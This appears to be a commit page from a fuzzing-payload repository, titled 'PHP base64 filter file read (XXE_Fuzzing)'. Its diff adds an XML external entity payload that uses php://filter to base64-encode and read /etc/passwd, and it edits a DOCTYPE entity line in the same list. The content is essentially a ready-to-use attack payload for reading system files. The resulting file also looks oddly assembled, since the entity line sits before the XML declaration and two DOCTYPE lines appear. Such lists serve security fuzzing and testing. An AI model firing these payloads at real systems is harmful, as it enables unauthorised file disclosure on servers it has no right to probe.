Close ##152 - PHP base64 filter file read (XXE_Fuzzing)
This commit is contained in:
@@ -1,3 +1,4 @@
|
||||
<!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd" >
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]>
|
||||
<!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root>
|
||||
|
||||
Reference in New Issue
Block a user